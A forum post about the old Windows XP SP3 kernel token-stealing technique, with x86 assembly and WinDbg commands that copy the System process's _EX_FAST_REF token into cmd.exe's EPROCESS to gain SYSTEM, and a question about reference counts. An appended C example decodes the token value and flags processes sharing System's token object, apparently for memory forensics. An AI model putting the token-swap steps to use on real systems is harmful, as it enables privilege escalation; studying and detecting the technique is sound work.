hi
this code is an old method to gain the SYSTEM token for our process (for example cmd.exe)
i know _EX_FAST_REF is a union and the last 3 bits must be 0 so the token field points to the real token object (on x64 it is 4 bits)
code:
    mov edi, [System_EPROCESS+WINXP_TOKEN_OFFSET] ; EDI <- Token of process with SYSTEM PID
    and edi, 0fffffff8h                           ; Must be aligned by 8
    mov [CMD_EPROCESS+WINXP_TOKEN_OFFSET], edi    ; We replace the token of the cmd process
                                                  ; to escalate by the token of the process
                                                  ; with SYSTEM PID
so what is the problem if we wholly change the _EX_FAST_REF of cmd with the _EX_FAST_REF of system?
code:
    mov ebx, [System_EPROCESS+WINXP_TOKEN_OFFSET]
    mov [CMD_EPROCESS+WINXP_TOKEN_OFFSET], ebx    ; now cmd EPROCESS _EX_FAST_REF must point to system _EX_FAST_REF
i do it and it works perfectly without any problem (after this cmd.exe gets the SYSTEM account)
i asked EP why closing cmd.exe doesn't lead the system to crash (the system must free the closed object, so the system process token now must point to an invalid object)
he says:
"System will not free this token object because its RefCount will not be counted as 0 after cmd.exe exits. Look at the "System" process token. Every one of them has at least 1 reference."
why does the system token have a big RefCount number?
what i do exactly in windbg:
81eef138 = system EPROCESS
_EX_FAST_REF offset in XPSP3 is 0x0c8
    dpa 81eef138+0x0c8
result => e1000805
81f49620 = cmd.exe EPROCESS
    ep 81f49620+0x0c8 e1000805
thanks
@R00tkitSMM
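An added example, not code from the post or from its author, that models the 32-bit _EX_FAST_REF union the way the post describes it (low 3 bits are a cached reference count, the rest is the 8-byte-aligned object pointer) and applies it from the memory-forensics side: it decodes the raw Token value e1000805 from the post into object pointer and cached count, then scans a constructed process listing and flags any process whose Token points at the same token object as System's, which is what the post's overwrite produces. The names, the smss.exe row and the "shared token object equals overwritten pointer" heuristic are assumptions of this example; the System and cmd.exe values are the ones shown in the post.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the 32-bit _EX_FAST_REF union as the post describes it: the low
 * 3 bits carry a cached reference count, the remaining bits are the pointer
 * to the object (which is therefore 8-byte aligned). The post says x64 uses
 * 4 bits; this example only models the 32-bit XP SP3 case. */
#define FAST_REF_CNT_BITS 3u
#define FAST_REF_CNT_MASK ((1u << FAST_REF_CNT_BITS) - 1u)   /* 0x7 */
#define FAST_REF_PTR_MASK (~FAST_REF_CNT_MASK)               /* 0xfffffff8 */

typedef struct {
    uint32_t object;  /* address of the real token object */
    unsigned refcnt;  /* cached references held in the low bits */
} fast_ref_t;

/* Split a raw EPROCESS.Token value into object pointer and cached count. */
fast_ref_t decode_fast_ref(uint32_t raw)
{
    fast_ref_t r;
    r.object = raw & FAST_REF_PTR_MASK;
    r.refcnt = raw & FAST_REF_CNT_MASK;
    return r;
}

/* One row of a process listing as a forensic tool would read it from a
 * memory image: EPROCESS address and the raw Token field at EPROCESS+0xc8. */
typedef struct {
    const char *name;
    uint32_t eprocess;
    uint32_t token_raw;
} proc_row_t;

/* Constructed sample. The System and cmd.exe values are the ones shown in
 * the post (cmd.exe after the `ep` overwrite); the smss.exe row is made up. */
static const proc_row_t SAMPLE[] = {
    { "System",   0x81eef138u, 0xe1000805u },
    { "smss.exe", 0x81f1a020u, 0xe1a3c2e3u },
    { "cmd.exe",  0x81f49620u, 0xe1000805u },
};
#define SAMPLE_LEN (sizeof SAMPLE / sizeof SAMPLE[0])

/* Heuristic (this example's assumption, not a documented Windows rule):
 * a process normally owns its own token object, so a non-System process
 * whose Token points at the *same* object as System's token has had its
 * pointer overwritten. Pointers are compared after stripping the cached
 * count bits, so 0xe1000805 and 0xe1000800 refer to the same object.
 * Returns the number of hits and stores their row indices in `hits`. */
size_t find_shared_system_token(const proc_row_t *rows, size_t n,
                                size_t *hits, size_t max_hits)
{
    size_t i, found = 0;
    uint32_t system_obj = 0;

    for (i = 0; i < n; i++)
        if (strcmp(rows[i].name, "System") == 0) {
            system_obj = decode_fast_ref(rows[i].token_raw).object;
            break;
        }
    if (system_obj == 0)
        return 0;  /* no System row: nothing to compare against */

    for (i = 0; i < n; i++) {
        if (strcmp(rows[i].name, "System") == 0)
            continue;
        if (decode_fast_ref(rows[i].token_raw).object == system_obj) {
            if (found < max_hits)
                hits[found] = i;
            found++;
        }
    }
    return found;
}

/* Runs the scan over the constructed sample; reports the first hit's index
 * through `first_hit` (or (size_t)-1 when there is none). */
size_t check_sample(size_t *first_hit)
{
    size_t hits[SAMPLE_LEN];
    size_t n = find_shared_system_token(SAMPLE, SAMPLE_LEN, hits, SAMPLE_LEN);
    if (first_hit)
        *first_hit = n ? hits[0] : (size_t)-1;
    return n;
}

int main(void)
{
    fast_ref_t sys = decode_fast_ref(0xe1000805u);
    size_t idx, n;

    printf("System token: object=%08lx cached refs=%u\n",
           (unsigned long)sys.object, sys.refcnt);
    n = check_sample(&idx);
    if (n)
        printf("%s (EPROCESS %08lx) shares System's token object\n",
               SAMPLE[idx].name, (unsigned long)SAMPLE[idx].eprocess);
    return 0;
}
```

The decode step is the same masking the post's `and edi, 0fffffff8h` performs; keeping the cached-count bits separate is what lets the scan treat the raw copy (`mov ebx` / `mov [..], ebx`) and the masked copy as pointing at one object.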